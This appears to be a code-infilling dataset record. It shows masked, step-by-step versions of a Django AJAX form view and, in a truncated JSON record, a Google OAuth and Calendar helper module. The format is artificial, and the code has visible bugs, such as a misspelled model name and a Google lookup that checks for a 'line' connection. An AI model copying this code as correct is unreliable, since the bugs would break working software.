<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
<|reserved_special_token_0|>
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
<|reserved_special_token_0|>
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
<|reserved_special_token_0|>
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
response = super().form_valid(form)
if self.request.is_ajax():
data = {'pk': self.object.pk}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
response = super().form_valid(form)
if self.request.is_ajax():
data = {'pk': self.object.pk}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from django.views.generic import CreateView, UpdateView, ListView, \
DeleteView, TemplateView
from example.forms import EditorTextForm
from example.models import EdidorText
class AjaxableResponseMixin:
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
# We make sure to call the parent's form_valid() method because
# it might do some processing (in the case of CreateView, it will
# call form.save() for example).
response = super().form_valid(form)
if self.request.is_ajax():
data = {
'pk': self.object.pk,
}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(
created_by=self.request.user
)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
|
flexible
|
{
"blob_id": "87a4fcb26464925952dde57fecf4709f01e9fed7",
"index": 9916,
"step-1": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-2": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-3": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-4": "<mask token>\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-5": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.views.generic import CreateView, UpdateView, ListView, \\\n DeleteView, TemplateView\n\nfrom example.forms import EditorTextForm\nfrom example.models import EdidorText\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {\n 'pk': self.object.pk,\n }\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(\n created_by=self.request.user\n )[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
<|reserved_special_token_0|>
def get_certs_keys(kid):
url = 'https://www.googleapis.com/oauth2/v3/certs'
data = requests.get(url).json()['keys']
return next(filter(lambda e: kid == e['kid']), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
<|reserved_special_token_0|>
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
if data() and 'line' in data.connections():
return data.connections.google.sub()
else:
raise RuntimeError
def add_event(real_user_id, start, end, options={'summary': '',
'description': ''}):
endpoint = (
'https://www.googleapis.com/calendar/v3/calendars/primary/events')
d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
d.update(options)
res = requests.post(endpoint, json=d, headers={'content-type':
'application/json', 'authorization':
f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
r = res.status_code == 200
if not r:
print(res.text)
return r
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_certs_keys(kid):
url = 'https://www.googleapis.com/oauth2/v3/certs'
data = requests.get(url).json()['keys']
return next(filter(lambda e: kid == e['kid']), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
if data() and 'line' in data.connections():
return data.connections.google.sub()
else:
raise RuntimeError
def add_event(real_user_id, start, end, options={'summary': '',
'description': ''}):
endpoint = (
'https://www.googleapis.com/calendar/v3/calendars/primary/events')
d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
d.update(options)
res = requests.post(endpoint, json=d, headers={'content-type':
'application/json', 'authorization':
f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
r = res.status_code == 200
if not r:
print(res.text)
return r
<|reserved_special_token_1|>
<|reserved_special_token_0|>
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from . import certificate
else:
from settings import settings
from util import Just
from db import get_collection
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
url = 'https://www.googleapis.com/oauth2/v3/certs'
data = requests.get(url).json()['keys']
return next(filter(lambda e: kid == e['kid']), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
if data() and 'line' in data.connections():
return data.connections.google.sub()
else:
raise RuntimeError
def add_event(real_user_id, start, end, options={'summary': '',
'description': ''}):
endpoint = (
'https://www.googleapis.com/calendar/v3/calendars/primary/events')
d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
d.update(options)
res = requests.post(endpoint, json=d, headers={'content-type':
'application/json', 'authorization':
f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
r = res.status_code == 200
if not r:
print(res.text)
return r
<|reserved_special_token_1|>
import datetime
from datetime import datetime, timedelta
import time
import json
import base64
import requests
from bson.objectid import ObjectId
import urllib
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from . import certificate
else:
from settings import settings
from util import Just
from db import get_collection
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
url = 'https://www.googleapis.com/oauth2/v3/certs'
data = requests.get(url).json()['keys']
return next(filter(lambda e: kid == e['kid']), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
if data() and 'line' in data.connections():
return data.connections.google.sub()
else:
raise RuntimeError
def add_event(real_user_id, start, end, options={'summary': '',
'description': ''}):
endpoint = (
'https://www.googleapis.com/calendar/v3/calendars/primary/events')
d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
d.update(options)
res = requests.post(endpoint, json=d, headers={'content-type':
'application/json', 'authorization':
f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
r = res.status_code == 200
if not r:
print(res.text)
return r
<|reserved_special_token_1|>
import datetime
from datetime import datetime, timedelta
import time
import json
import base64
import requests
from bson.objectid import ObjectId
import urllib
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from .import certificate
else:
from settings import settings
# import util
from util import Just
from db import get_collection
# import certificate
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
url = 'https://www.googleapis.com/oauth2/v3/certs'
data = requests.get(url).json()['keys']
return next(filter(lambda e: kid == e['kid']), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, "google_oauth", {"realid": realid})
return 'https://accounts.google.com/o/oauth2/v2/auth?' \
+ f"client_id={client_id}&" \
+ f"include_granted_scopes={'true'}&" \
+ f"redirect_uri={redirect_uri}&" \
+ f"scope={scope}&" \
+ f"access_type={access_type}&" \
+ f"state={state}&" \
+ f"prompt={prompt}&" \
+ f"response_type={response_type}"
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {
'code': code,
'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri,
'grant_type': 'authorization_code'
}).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
# key = get_certs_keys(header['kid'])
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid), 'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {
'$set': {
'connections.google': profile,
},
'$inc': {
'connections.length': 0 if user else 1
}
})
print('add google info')
else:
users_db.insert_one({
'connections': {
'google': profile,
'length': 1
}
})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {
'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'refresh_token': refresh_token,
'grant_type': 'refresh_token'
}).json()
def verify_access_token(access_token):
url = f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}'
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({"connections.google.sub": user_id})["_id"])
def get_google_user_id(real_user_id):
data = Just(users_db.find_one({"_id": ObjectId(real_user_id)}))
if data() and ('line' in data.connections()):
return data.connections.google.sub()
else:
raise RuntimeError
def add_event(real_user_id, start, end, options={
'summary': '',
'description': ''
}):
endpoint = 'https://www.googleapis.com/calendar/v3/calendars/primary/events'
d = {
'end': {
'dateTime': end,
'timeZone': 'Asia/Tokyo'
},
'start': {
'dateTime': start,
'timeZone': 'Asia/Tokyo'
},
}
d.update(options)
res = requests.post(endpoint, json=d, headers={
'content-type': 'application/json',
'authorization': f'Bearer {get_access_token(get_google_user_id(real_user_id))}'
})
r = res.status_code == 200
if not r:
print(res.text)
return r
|
flexible
|
{
"blob_id": "c75c69b006734e476352de1913fd4a58021bffd6",
"index": 2704,
"step-1": "<mask token>\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\n<mask token>\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
